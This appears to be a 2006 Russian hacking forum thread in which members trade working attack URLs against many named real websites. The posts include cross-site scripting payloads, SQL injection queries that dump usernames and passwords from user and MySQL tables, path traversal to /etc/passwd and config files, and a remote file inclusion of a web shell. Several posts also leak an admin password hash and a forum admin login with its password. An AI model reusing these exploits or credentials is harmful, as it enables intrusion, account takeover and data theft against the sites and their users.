http://www.netcat.ru/search/?action=index&text=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&need_url=
http://mp3plus.ru/artist.php?id=446%27&id_jam=0
http://search.tut.by/?status=1&encoding=1&page=0'&how=rlv&query=666
http://list.gala.net/?p=1&cid=1"><script>alert()</script>
http://narod.yandex.ru/cgi-bin/yandmarkup?cluster=4&prog=0x2757571A&HndlQuery=87259504&PageNum=0&g=5&d=0&ag=host&tg=1&q0=1009151392%27%22%3E%3Cscript%3Ealert()%3C/script%3E&p=%27
http://www.e-mail.ru/fast/register.dll?show=.%3Cscript%3Ealert()%3C/script%3E
http://rusmuz.ru/m.php?artist=%3Cscript%3Ealert()%3C/script%3E&search=1&search_in=0
http://www.mp3search.ru/search.html?q=%3Cscript%20language=%22JavaScript%2 2%3E
http://shop.updated.com/shoppingSearch.jsp?query=%22%3E%3Cscript%3Ealert() %3C/script%3E
http://www.7wolf.ru/index.php?content=review&gam_id=6482&cdr_id=8294'
http://www.7wolf.ru/index.php?nws_date_d=03<script>alert()</script>&nws_date_m=11&nws_date_y=2005&content=news
http://www.games.ru/cheats/?search=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript% 3E&PSearch=name
http://www.pages.ru/search.html?text=%3Cscript%3Ealert%28%29%3C%2Fscri pt%3E
http://www.oszone.net/search.php?searchtext=%22%3E%3Cscript%3Ealert%28%2 9%3C%2Fscript%3E&send.x=0&send.y=0
http://severe.ru/index.php?h=10%27
http://accont.ru/modules.php?POSTNUKESID=8920f73b65506c4a835faf9454 31ae42&name=Search&file=index&op=modload&action=search&overview=1&active_stories=1&bool=AND&stories_cat=&stories_topics=&q=%27
http://aromas.ru/forum/search.php?text_poisk=%27
http://best-test.ru/index.php?t=display_link_search&having=29&cat=0&sid=516478392%27
http://www.fiona.ru/phprusearch.php?query=%22%3E%3Cscript%3Ealert%28%2 9%3C%2Fscript%3E
http://music.mail.ru/news/1846?menu_item=club"%20style%3Dbackground%3Aurl%28JaVaScRiPt%3Aalert%2 8%29%29%3B
http://www11.pochta.ru/info.php?mid=agreement&lng=ru"><script>alert()</script>
http://arcade.icq.com/game.htm?code=110272767&RefId=910"><script>alert()</script>
http://www.koders.com/?s=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&_%3Abtn=Search&_%3Ala=*&_%3Ali=*
http://linuxcenter.ru/news/2005<textarea>/11
http://www.video48.ru/search/?search=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://mp3rank.ru/shop'/
http://hotcharts.ru/mp3/mp3.php?id=065110097115116097099105097032038032066 10111003207711111110012103204503206911810111412111 6104105110103032098117114110115&source3=268&source4=65/6596&source8=3/357&source11=9120&source12=118'"><script>alert()</script>
http://kurepin.ru/?id=113&color=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://by.ru/cat.cgi?query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fs cript%3E
http://ishodniki.ru/ilook/search.php?query=%27style%3Dbackground%3Aurl%28JaV aScRiPt%3Aalert%28%29%29%3B&m=or
http://www.proshivki.ru/downloads.php?productor=15'&chapter=7&page=1
http://www.ozon.ru/context/kidworld_detail/id/2266364/default.aspx?Name=&Title=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&EMail=&Description=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscr ipt%3E&Country=%D0%EE%F1%F1%E8%FF%2F&ViewComment=%CF%F0%EE%F1%EC%EE%F2%F0%E5%F2%FC#comm ent
http://www.rbsearch.ru/search.php?said=rbs_999&qq=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://www.nmarket.ru/phone/search/?action=search&mode=string&type=phone&data=%27
http://www.888.com/site1/default.htm?page=main&lang=en&S=120871487149920257&OS=120871487149920257"><script>alert()</script>&SR=677164&OSR=677164&flag=No&un=false&ver=java&l=&st=173&bc=123&anid=0&ic=0
http://www.tutorialized.com/tutorials/Perl-and-CGI/File-Manipulation/1'/1
http://sfgate.com/cgi-bin/qws/ff/qr?term=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&Submit=S
http://www.tug.org/PSTricks/main.cgi?search=%3Cscript%3Ealert%28%29%3C%2Fscrip t%3E&search=Search
http://www.asianjournal.com/cgi-bin/view_file.cgi?file=../../../../../../../../../../etc/passwd
http://www.colorado.edu/ralphie/find/fastfind.cgi?arch=guide&string=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
http://img365.imageshack.us/my.php?image=../../../../../../../../../../etc/passwd
http://mail.yandex.ru/search?text=666&address=%22+style%3Dbackground%3Aurl%28JaVaScRipT% 3Aalert%28%29%29%3B&addr=from&all_check=0&folder=[ваш_номер]&folder=[ваш_номер]&folder=[ваш_номер]&do=1
http://baku.ru/frmpst-text.php?cmm_id=34"><script>alert()</script>&usp_id=0&frm_id=362&frmpst_id=2483783&id=2946020
http://sources.ru/cgi-bin/sources/search/search.cgi?stpos=0&query=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&stype=AND
http://phpclub.ru/index.php?city="%20style=background:url(JaVaScRiPt:alert());&m=job
http://nextworld.ru/index.php?login=%22+style%3Dbackground%3Aurl%28jav ascript%3Aalert%28%29%29%3B <<затем нажать на вход
http://library.dozory.ru/cgi-bin/search.cgi?text=%27%3B%3C%2Fscript%3E%3Cscript%3Ea lert%28%29%3C%2Fscript%3E&x=0&y=0
http://www.pentagon.gov/srch/search?template=%2Fsearch%2Fresults-template-dl.html&c=A3B245203F9EBEC5FC8C306E4AAF152F&c=8268333F54379065&c=6FDF5BD0BF338D19&c=1DA2190B5E9F39D2&q=666&submit=Search&sort=-pub_date%27
http://www.crh.noaa.gov/ifps/<script>alert()</script>
http://www.nws.noaa.gov/wwamap/wwatxtget.php?cwa=usa&wwa=flood%20statement<script>alert()</script>
http://www.tcnet.ru/error.html?err=404&msg=<script>alert()</script>
http://www.oxigen.ru/redirect.cgi?.<script>alert()</script>
http://sitecity.ru/badlogin.phtml?message=<script>alert()</script>
http://www.securitylab.ru/bitrix/redirect.php?event1=extra_article_click&event2=poc&event3=241574&goto=<script>alert()</script>
http://www.web-hack.ru/tools/nslookup.php?hostname=%3Cscript%3Ealert%28%29%3C%2 Fscript%3E
http://find.gl/search.php?qq=<script>alert()</script>&said=&d=1
http://www.hostpk.net/luke.php?action=explorer&dir=<script>alert()</script>&do=download
http://capitalcity.combats.ru/enter.pl?login=%22%3E%3Cscript%3Ealert%28%29%3C%2F script%3E&step=2&reminder=%CF%E5%F0%E5%E9%F2%E8+%EA+%F1%EB%E5%E4%F3 %FE%F9%E5%EC%F3+%F8%E0%E3%F3123123http://search.cstrike.ru/?search=\'
http://search.gamestone.ru/?search=<script>alert()</script>
http://3mp3.ru/ru/search/text/?request=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript %3E&what=all
http://holidayclub.inprogress.ru/catalog/index.php?flet=\"><script>alert()</script>&Co=4&Re=460
http://hotels.wia.ru/<script>alert()</script>
http://encycl.accoona.ru/?word=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://www.bioone.org/bioone/?request=<script>alert()</script>
http://www.openhardware.net/?file=<script>alert()</script>
http://www.avionicsmagazine.com/cgi/av/show_mag.cgi?pub=av&file=../../../../../../../../../../../etc/passwd
http://www.lamuv.de/cgi-bin/store.cgi?action=gamma&file=../../../../../../../../../../../etc/passwd
http://alumni.calstatela.edu/document.cgi?section=about&file=../../../../../../../../../../../etc/passwd
http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script>
http://www.linuxhq.com/perl-bin/search_db?q=%27style%3Dbackground%3Aurl%28javascri pt%3Aalert%28%29%29%3B%27&qid=4&spp=20
http://seminar.spylog.ru/?rp=seminars/descr/15\'/
http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1\'
http://hw.ru/hi-tech/Login.jsp?login=\'\"><script>alert(1)</script>&password=\'\"><script>alert(2)</script>
http://www.srb.ru/search-results/?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&m=all&wm=wrd&ps=10&page=0
http://www.profits.ru/login.php?w=user&o=login&e=u\'
http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
http://smchat.ru/?s=reguser&login=\"><script>alert()</script>
http://www.film.ru/search.asp?what=%22style%3Dbackground%3Aurl%28java script%3Aalert%28%29%29%3B%22&where=root&mode=medium
http://www.mtve.com/index.php?Page=2\"><script>alert()</script>
http://register.logitech.com/index.cfm?validate=1\";</script><script>alert()</script>
http://www.w3.org/Search/Mail/Public/search?keywords=&hdr-1-name=subject&hdr-1-query=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3 E&index-grp=Public__FULL&index-type=t&type-index=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3 E
http://serial.com/?show=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&submit=Search
http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1\"style=background:url(javascript:alert());\"
http://poisk.ru/#\"><script>alert()</script>
http://an.aport.ru/scripts/template.dll?That=ref&r=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&Base=referat&Rt=2
http://www.sexvideogid.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E
http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170\"><script>alert()</script>
http://catalog.aport.ru/rus/themes.aspx?id=1778\'\"><xz>
http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url=\"style=background:url(javascript:alert());\"
http://www.iceberg.ru/services/?id=23\'&parent=0http://www.spguwc.h15.ru/gb/index.php?action=viewcommentshttp://www.yuretz.ru/prikol.php?id=384\'
http://forum.farit.ru/calendar.php?s=&action=edit&eventid=14\'
http://www.naec.ge/?search_string=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://www.xoxma.od.ua/xoxma/10/473\'
http://www.koms.ru/forum(page2).php?conf=aa
http://www.tom-muck.com/blog/master.cfm?searchbox=\"><script>alert()</script>&Submit=Search
http://www.tom-muck.com/blog/index.cfm?month=12&year=2005&newsmonth=12/1/2005\'
http://www.webbe.de/index.shtml?CONTENT=search&SEARCHACTION=search&LANG=de&SEARCH=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3 E&ASSOCIATION=OR
http://mobile.optima.ua/bomba.php?c_id=10\'&lim=40\'\"><script>alert()</script>
http://comp-lik.biz/index.php?q=<script>alert()</script>&search_news=1&search_articles=1&search_downloads=1&search_links=1&search_faq=1&search_gallery=1&search_static=1&p=query&area=1
http://comp-lik.biz/index.php?categ=9\'&parent=0&p=downloads&area=1
http://www.prokredo.ru/ru/library/index.php?q13=&t13=&c13=20\'&show13=materials
http://card.romanticcollection.ru/toprated.php?page=<script>alert()<script>
http://blog.msk.ru/login.php?login=<script>alert()</script>&pass=&submit=OK
http://www.paladins.ru/znaxar.php?free=\"><script>alert(1)</script>&sila1=3\"><script>alert(2)</script>&lovk1=3\"><script>alert(3)</script>&intuiz1=3\"><script>alert(4)</script>&vinos1=12\"><script>alert(5)</script>&intel1=\"><script>alert(6)</script>&mudr1=\"><script>alert(7)</script>&sila2=\"><script>alert(8)</script>&lovk2=\"><script>alert(9)</script>&intuiz2=\"><script>alert(10)</script>&vinos2=\"><script>alert(11)</script>&intel2=\"><script>alert(12)</script>&mudr2=\"><script>alert(13)</script>&flag=2\"><script>alert(14)</script>
http://horoscopes.rambler.ru/day.html?day=1<script>alert(1)</script>&month=4&year=1965<script>alert(2)</script>
http://nakarte.rambler.ru/moscow/?query=%27
http://www.mebelm.com/search/?q=\'
http://www.ddd.kursknet.ru/cgi-bin/chat.pl?id=&language=<script>alert()</script>
http://games.alkar.net/csreg/chpass.php?filled=&account=\"><script>alert()</script>&password=&sendpass=
http://sofit.com.ua/rus/asearch/0/1/0/?ser_mid=-1&go_search=1&q_search=\"><script>alert()</script>
http://7000.ru/computers/details.php?id=2\'
http://www.softportal.com/search.php?search=1&search_string=\"><script>alert()</script>
http://catalog.begun.ru/?q=\"><script>alert()</script>
http://cio.iv.ru/search.html в поиске sql пример 666\'
http://www.3a.kiev.ua/good.php?name=<script>alert()</script>
http://referat.na5.ru/load.php?id=504948\'
http://referat.apple-online.ru/index.php?type=diplom_1&id=3478\'
http://www.mobiteka.ru/melodies/melodies.shtml?artid=27\'
http://valinfo.ru/testresult.php?idtestgroup=0\'
http://www.newstrack.ru/newstrack3/portal/news/view/20050414/a/
http://www.1bb.ru/directory.php?cat=35\'
http://orsn.rambler.ru/baza/consult/index.php?action=tema&kod=1\"><script>alert()</script>
http://katz.ws/?q=\"><script>alert()</script>
http://www.flashmaster.ru/search/index.php?words=\'
http://www.flashmaster.ru/search/index.php?words=%5C%27§ion%5B%5D%3Dnews§ion%5B%5D%3Dcatalog§ion%5B%5D%3Duser§ion%5B%5D%3Drating§ion%5B%5D%3Dswf§ion%5B%5D%3Dforum&page=17
http://www.ext.ru/?id=7\"><script>alert()</script>
http://bbcom.ch/index.php?suche_wort=\"><script>alert()</script>
http://www.igromania.ru/games/?666\'
У меня вопрос, зачем в строке http://www.ext.ru/?id=7\"><script>alert()</script>
/? И без него всё отлично запускается)
degeneration x
24.05.2006, 21:00
Очень много повторных.
ZetRider
24.05.2006, 21:01
Ну уж извените, как смог!
Большинство багов принадлежат Киборгу! Респект чувак!
EST a1ien
24.05.2006, 21:04
_http://plg.lrn.ru/index.php?sub=proj&sort=1
Нефильтруется ниодин параметр XSS(актив)
_http://www.information.com/search/index.html?brand=1&cat=1&keyword=slip"><script>alert(/slip/)</script>
back0rifice
25.05.2006, 04:30
Большинство багов принадлежат Киборгу!
Отжёг... А самому искать - не судьба?!
_http://www.aif.md/index.asp?qu=%3Cscript%3Ealert%28%2Ff0und_by_back0 rifice%29%3C%2Fscript%3E&Submit=%CD%E0%E9%F2%E8&doc=search
_http://www.climate.md/?page='client/belt
_http://www.dnestrblog.net/comunity/blogs/lianc/commentrss.aspx?PostID=252'
_http://www.forum.md/Discuss.aspx?id=700595'
_http://www.galanter.net/guests/showguest.asp?Account=9'
_http://www.iks.ru/etc/passwd
_http://www.meteoprog.com.ua/gorodMira.php?cityid=277'
_http://www.sdarm.md/shownews.php?id=14'
_http://www.takt.tomsk.ru/db/trav2.list_member?pid=513'
_http://www.transneogrup.md/news/news.php?ln=ru&s=n&id=76'
_http://www.yes.md/RemarkList.aspx?theid=25&disid=1018'
EST a1ien
25.05.2006, 14:09
_http://shveimash.spb.ru/index.php?type=pages&id=-1+union+select+null,null/*
_http://shveimash.spb.ru/index.php?type=catalog&id=111&brand=%3Cscript%3Ealert(12)%3C/script%3E
_http://search.nasa.gov/search/search?searchType=lb&q=%3C%2Ftitle%3E[sL1p]%20%20%3Ctextarea+style%3D%22display%3Anone%22%3E&btnG=GO&output=xml_no_dtd&sort=date%3AD%3AL%3Ad1&site=nasa_collection&ie=UTF-8&oe=UTF-8&client=nasa_production_lb&proxystylesheet=nasa_production_lb&actionType=searchIndex&numgm=5
Вот такое крутое наса :)
XSS на go.mail.ru
Не фильтруется: surl..
http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25 FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%2Burl% 253D%2522www%2Edogcatalog%2Enet%252F%2A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE% 25E7%25E4%25E0%25ED%25E8%25E5&surl=<script>alert('XSS')%3B</script>
Не фильтруется: id, iid, pageurl.
http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl="><script>alert('XSS')%3B</script>&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b
Не фильтруется: id, imgurl, iid, pageurl.
http://go.mail.ru/details.html?imgurl=http%253A%252F%252Fwww%2Etonne l%2Eru%252Ffonoteka%252Fispol%252F576227168_tonnel %2Egif&id="><script>alert('XSS')%3B</script>&iid=2&pageurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252F% 253Fl%253Dfonoteka%2526main%253D33&imgheight=421&imgwidth=300&ref=1&links=1&imgsize=9025
Подмена фрейма.
http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl=http://www.antichat.ru/&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b
degeneration x
25.05.2006, 20:31
Пиво Buckler - buckler.ru
http://www.buckler.ru/down.php?file=../inc/connect.php
http://www.buckler.ru/down.php?file=../../../../../../../../etc/passwd
И ещё xss на nasa, лолики они:)
_http://search.nasa.gov/nasasearch/search/advSearch.jsp?nasaInclude=%3CIMG+SRC%3D%60javascri pt%3Aalert%28%22slip%3A%27NASA+LOL%27%22%29%60%3E&qt=all&qx=&qm=anywhere&dct=Any+Type&dn=&dt=at&recPerPg=10&displayFormat=detail&sortBy=Scoredesc
еще mail.ru
_http://astral.mail.ru/numer.php?mode=9&cnum=&fio="><script>alert(1)</script>&afio=test
_http://astral.mail.ru/sin.php?month=11&year=2005&month1=12&year1=2003<script>alert(document.cookie)</script>
_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Cscript%3Ealert%28%2Fslip%2F%29%3 C%2Fscript%3E&method=exact
_http://www.sabrina.ru/search.php?action=shared_simple&bigboss=l_0&search_kind=and&action=shared_simple&phrase=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscri pt%3E&B1=
_http://goohoo.ru/search.bat?w=referats&q=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E
_http://mybb.ru/cat.php?go='
EST a1ien
26.05.2006, 18:55
[.GOV]
_http://fedbbs.access.gpo.gov/library/view/lib/?lib=%3Cscript%3Ealert('a1ien')%3C/script%3E
_http://www.weather.gov/glossary/index.php?letter=%3Cscript%3Ealert(/a1ien/)%3C/script%3E
_http://allard.senate.gov/public/index.cfm?FuseAction=Polls.Results&PollsPoll_id=16'&IsPopUp=True
degeneration x
26.05.2006, 23:54
http://www.reusablebags.com/facts.php?id=-5+union+select+1,2,name,4,5,6,7+from+shop+where+id =1/*
Очень интересная вещь:)
_http://referat.kulichki.net/cgi-bin/refsearch/search.cgi?query=%3Cscript%3Ealert%28%2F[sL1p]%2F%29 %3C%2Fscript%3E&bool=or
PS Что бы всё нормально работало, уберите пробел между: ...2Fslip%2F%29 %3C%2Fscript%...
Dracula4ever
27.05.2006, 19:02
http://www.ytc.subs.ru/dm/
_http://www.rbsearch.ru/search.php?best=0&said=rbs_210&qq=%3Cscript%3Ealert%28%2F%5BsL1p%5D%2F%29%3C%2Fsc ript%3E&Submit2=%C8%F1%EA%E0%F2%FC
forum.fozya.com - туса педофилов
_http://www.fozya.com/anecdot.php?view=all&n=1-100&category=19999+UNION+SELECT+0,0,user_password,0,0, 0,username+FROM+phpbb_users+LIMIT+0,10/*
детей жалко. Сочувствующие приймите меры.
админ:
Fozya:67bf9ec4b550e0a91bc8f2ecb0ceb0dc
пароль он может уже поменял (я там поучил их жизни :) )
_http://www.fozya.com/erotika.php?sub=153'
VALUEHOST.RU
_http://www.valuehost.ru/signup/?sg=1+union+select+1,2,user,password,5,6,7,8,9,10+ from+mysql.user/*
ВНИМАНИЕ!!! Защищено от киддисов.
degeneration x
27.05.2006, 23:52
http://www.pci.ru/index2.php?action=category_view&id_categ=-1776+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll/*
_http://www.pci.ru/index2.php?PHPSESSID=71b154d4e17f24558d92e1033fddf 37c&action=search&fr_name=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E%3 Ch1%3EV+test%3C%2Fh1%3E
еще один ХОСТИНГ
http://yard.ru
скул http://yard.ru/members
бага в поле Login
ставим ковычку и наблюдаем
_http://www.netsec.ru/404.php-сайт насколько я знаб Green_Bear
Dracula4ever
28.05.2006, 10:15
http://www.youtube.com/watch?v=JFIrcev6Lh4&search=macbook%20apple%20bootcamp%20laptop%2'0hard ware
http://www.sela.ru/catalog/allmodel.php?pol=6&gr1=47&gr2=23'2&col=
На главной странице;)
_http://www.westbyte.com/index.phtml?lng=Russian"><script>alert(/[sL1p]/)</script>
_http://www.qmp3.ru/search.php?string=http%3A%2F%2Fwww.westbyte.com%2F index.phtml%3Flng%3DRussian%22%3E%3Cscript%3Ealert %28%2F%5BsL1p%5D%2F%29%3C%2Fscript%3E&st=all
_http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
На главной странице в поиск вбиваем простой вызов алерта, и всё:
_http://poisk.dn.ua/
И тут также:
_http://www.poputchik.ru/
Некачественные поисковики пошли;)
_http://mp3rank.ru/search/search.php?said=240&q=%3Cscript%3Ealert%28%2F%5BsL1p%5D%2F%29%3C%2Fscr ipt%3E&sbox=1
_http://www.tela.ru/tela_pg.pl?pid=24735&kw=<script>alert(/[sL1p]/)</script>&cd=1&ps=10&dt=0&lg=rus
_http://www.medlux.ru/dsearch/ddb.cgi?pattern=%3Cscript%3Ealert%28%2F%5BsL1p%5D% 2F%29%3C%2Fscript%3E&allds=yes
degeneration x
30.05.2006, 00:13
PHPinclude
http://c-s.ru/index2.php?[patch_to_file]
degeneration x
30.05.2006, 16:26
http://abc.ru/s/prop/prop.pl?name=price&maxprice=40%27
Dracula4ever
30.05.2006, 16:49
Вот ещё несколько:
http://www.ramtl.ru/index.php?action=showproduct&prod_id=
http://www.tatalc.ru/index.php?page=30&menuid=30&levelid=2604&iddoc=2606
http://www.l2db.ru/item.php?id=286&c=4
http://www.max.az/comment.php?id=2'39
EST a1ien
30.05.2006, 19:37
_http://www.shop52.ru/rubricator.php?w=%C8%3Cscript%3Ealert(/a1ien/)%3C/script%3E
_http://www.orioner.ru/racelist/rl_game.php?server=&game=%3Cscript%3Ealert(/a1ien/)%3C/script%3E
_http://www.orioner.ru/racelist/rl_race.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+rl_race/*
http://top.mail.ru/code?type=130&session=0&url="></a></font><script>alert(1)</script>
Dracula4ever
30.05.2006, 19:57
http://www.obyava.ru/cars/LandRover/p17'2/
Dracula4ever
30.05.2006, 20:05
Вот ещё один:
http://www.aisttv.ru/newsite/index.php?&rid=11722&topic=1&ddd=dracula4ever
Dracula4ever
30.05.2006, 21:09
Баг на сайте школа танцев:
http://www.fox-studio.ru/index.php?razd=7'8
_kREveDKo_
01.06.2006, 22:56
Сайт первого музыкального канала в Беларуси
http://one.by/forum/showprofile.php?User=%3Ch1%3Elol
http://one.by/forum/postlist.php?Cat=&Board=puvx&page=1&view=collapsed&sb=5'&o=186
http://one.by/forum/showflat.php?Cat=&Board=puvx&Number='
_http://www.litra.ru/search.php?query=%3Cimage+style%3Dbackground%3Aurl %28javascript%3Aalert%28%2F%5BsL1p%5D%2F%29%29%3E
_http://referat.svitonline.com/search.php?s=%3Cimage+style%3Dbackground%3Aurl%28j avascript%3Aalert%28%2F%5BsL1p%5D%2F%29%29%3E&Submit=%CF%EE%F8%F3%EA
_http://www.ukrreferat.com/index.php?search=%3Cimage+style%3Dbackground%3Aurl %28javascript%3Aalert%28%2F%5BsL1p%5D%2F%29%29%3E&how=a
_http://www.achat.ru/referats/search.pl?query=%3Cimage+style%3Dbackground%3Aurl% 28javascript%3Aalert%28%2FSLIP%2F%29%29%3E&submit=%CF%EE%E8%F1%EA
_http://chat.ukra.net/index.php?Query=2UR5Mr7W6GM0MzRBES1FeXq8FjNdXTS8hY we18Vd7Pc8PGqi3kVhARrc3QTluv%252B7ySYbsDOMUFEiB%25 2FPOVhLo%252BJOSZPjfRm9SyU9OoOMwG6Ae2bY4evdx3ajXmI 4iX3DH0%252FS3HnzypLekbFVT%252BARwAFeKsG22dIzW3877 nIOEVLLQV3FYPwBXsiovO9WwBZCtT7cmAW%252BAX%252F8iOg cmQEMrIbDEzxM024SlyVyBf64ahe%252B6vw3FpRriOHFU%252 FRjh56aJeqFxW0u2FKAyjJae5%252F2bSO3r47KHjxYB1Jg2vb A6OYDju3mV17Fv%252BFgeXJ989WSmxjSUurhlIx4uTWrVenng aIepM4nx%252FH2DND%252BuVz3tboovOAhlzds%253D&SearchKeywords=%3Cscript%3Ealert%28%2F%5BsL1p%5D%2 F%29%3C%2Fscript%3E
Dracula4ever
04.06.2006, 16:34
http://sony.odessa.ua/show_cart.php?new=7000167001&PHPSESSID=eabe11f124b4ee56cd62e27a5'58ff43d
http://www.icq.com/search/results.php?q='><script>alert('Xss')</script>
баг уже закрыли...
_http://www.maillist.ru/login/6/
записываем алерт в Email
О и я нашол сайт с багой _http://www.cqf2.com/index.php?page=http://rst.void.ru/download/r57shell.txt
вот еще
_http://www.checkproxy.com/checkp/ru/checkproxy/?PHPSESSID=FEDCBA9876543210FEDCBA9876543210
аллерт в строку адреса
и вот:
_http://www.hmao.info/
алерт в разделе "У вашей фирмы есть новости?
"
во все строки вписываем алерт и получается 3 окошка =)
Вот может надо кому-нить...
http://www.forum.avatardom.ru/fonts/getcmd.php
Вход в админку форума
Login: admin
Pass: 7575135
_http://www.soft-info.ru/search.php?do=search&search1=on&q=%3Cscript%3Ealert%28%2FKaban%2F%29%3C%2Fscript%3 E&submit=%CD%E0%E9%F2%E8
=\
_http://www.leontiev.ru/ какая попса такой и сайт (записываем алерты в поисковик,а потом в email )
_http://www.spartak.ru/send/subscribe.php - алерт
_http://www.ixbt.com/news/index.php?str=%3Cscript%3Ealert%28%2Kaban%2F%29%3C %2Fscript%3E&x=41&y=8
_http://murchat.ru:8080/login"><script>alert(/[sL1p]/)</script>
_http://obsudim.ru/search - алерт в поисковике на сайте веб дизайна...
Алерты в поисковиках...
_http://www.stroynet.ru/search.htm?name=%3Cscript%3Ealert%28%2Fkaban%2F%29 %3C%2Fscript%3E
_http://catalog.begun.ru/?SESSION=2fdeea68ee8ff03fccf34787d2e2c7c7&q=%3Cscript%3Ealert%28%2Fkaban%2F%29%3C%2Fscript%3 E&x=8&y=3
_http://www.rwr.ru/?find=%3Cscript%3Ealert%28%2FKaban%2F%29+%3C%2Fscr ipt%3E&x=20&y=7
что творится.... ужас...
_http://www.ukrbiznes.com/website.php?id=22776 -алерт
_http://www.muna.ru/search/?search=%3Cscript%3Ealert%28%2FKaban%2F%29%3C%2Fsc ript%3E
http://kidala.info/ssilki.php?cat=%2527
Dracula4ever
08.06.2006, 15:13
http://www.mtpp.org/news.php?id=16'43
http://www.dinur.ru/katalog2.php?id=80&krod=4'
http://www.terusco.ru/index1/4'6
_http://forums.realcoding.net/index.php?act=Print&client=choose&f=59&t=1539
_kREveDKo_
08.06.2006, 22:03
http://sms.by/search.php?act=search&search_str="><body onLoad=alert(/xss by базя/)>
http://songs.ru/search.php?where1=any&where2=midi&what="><body onLoad=alert(/xss by базя/)>
_http://www.mahle.ru/cgi-bin/search.cgi?kat=%3Cscript%3Ealert%28%2FXSS, АААААА%2F%29%3C%2Fscript%3E - автозапчасти из Европы :)
_http://www.autoland.ru/ -алерт
_http://www.toyota-izmailovo.ru/search -алерт
Dracula4ever
09.06.2006, 10:42
http://www.desk.kz/edit.php?&c=3&type_main=1'
http://nr.crimea.ua/obj.php?o=108'021
http://lib.muctr.ru/news.php?action=podr&time=2005031616'5415
Dracula4ever
09.06.2006, 14:57
Баг на одном из сайтом GanjaWars :
http://www.ganjubass.com/object.php?id=1869'0
h_ttp://www.fifa.com/en/news/searchresult.html?searchtext=%22%3E%3Cscript%3Eale rt('nafik+etot+futbol=)')%3C/script%3E
ЗЫ привет кловер))
_http://www.rupoisk.ru/index.php -алерт в поиске
_http://blog.seotext.ru/internet/138 -алерт в поиске
_http://www.kommersant.ru/archive/archive-today.html -алерт поиске
_http://www.forextimes.ru/find/?find=&submitform.x=5&submitform.y=7 -алерт в поиске
_http://newsinfo.ru/search.php?auth_logout=0 -алерт в поиске
_http://www.newsmusic.ru/news_3_2093.htm -алерт в поиске
_http://www.jewish.ru/search.php -алерт в поиске
_http://c55.forates.com/item_145848.html -алерт в поиске
_http://comparative.edu.ru:9080/PortalWeb/Find -алерт в поиске
Вот,кстати, сайтец и форум интересные,но
_http://links.powernet.com.ru/soft.php?ganr=16'
podkashey
10.06.2006, 05:26
На www.hotmail.com при регистрации идет редирект:
http://switch.atdmt.com/action/msn_hm_en_US_signup_link?href=http://www.ya.ru
Dracula4ever
10.06.2006, 06:42
Kaban а не легче давать просто линки на алерт а не писать что есть алерт в поиске.
Вот тебе пример:
http://www.forextimes.ru/find/?find='><script>alert('xss')</script>
http://www.canadaontheweb.ca/canada/search.html?query='><script>alert()</script>
Dracula4ever
10.06.2006, 20:12
http://www.kalitka-plitka.ru/catalog/?id=16&sub=32&stuff=28&PHPSESSID=e290f7c002397d6fa05d621d31948b'26
Dracula4ever
10.06.2006, 20:46
http://catalog.begun.ru/?q="><script>alert('dracula4ever')</script>
http://www.linkexplorer.ru/4/?link=70792'
Dracula4ever
11.06.2006, 16:30
http://www.amira-toys.ru/show_cart.php?new=3101&catid=24&PHPSESSID=d079c6865f941a8648a9007892607398'
http://www.autozap4asti.ru/parts.php?task=showTree&carid=525&mod=246&typeid=8902'
http://www.stails.ru/index.php?id=6&PHPSESSID=2d6748571c1e52b2071cb3fa7b18d9aa'
http://www.upk1.ru/index.php?id=15&add=1&parent_id=22'
http://test.fanfics.ru/index.php?section=3&id=221'
http://www.utravel.ru/search.php?pin=1133872666&tourid=74'
http://minagro.gov.ua/sgbazi/zr/protect.php3?id=3'
http://www.komfarm.by/press-centre.php?page=1&id=27&Show=0'
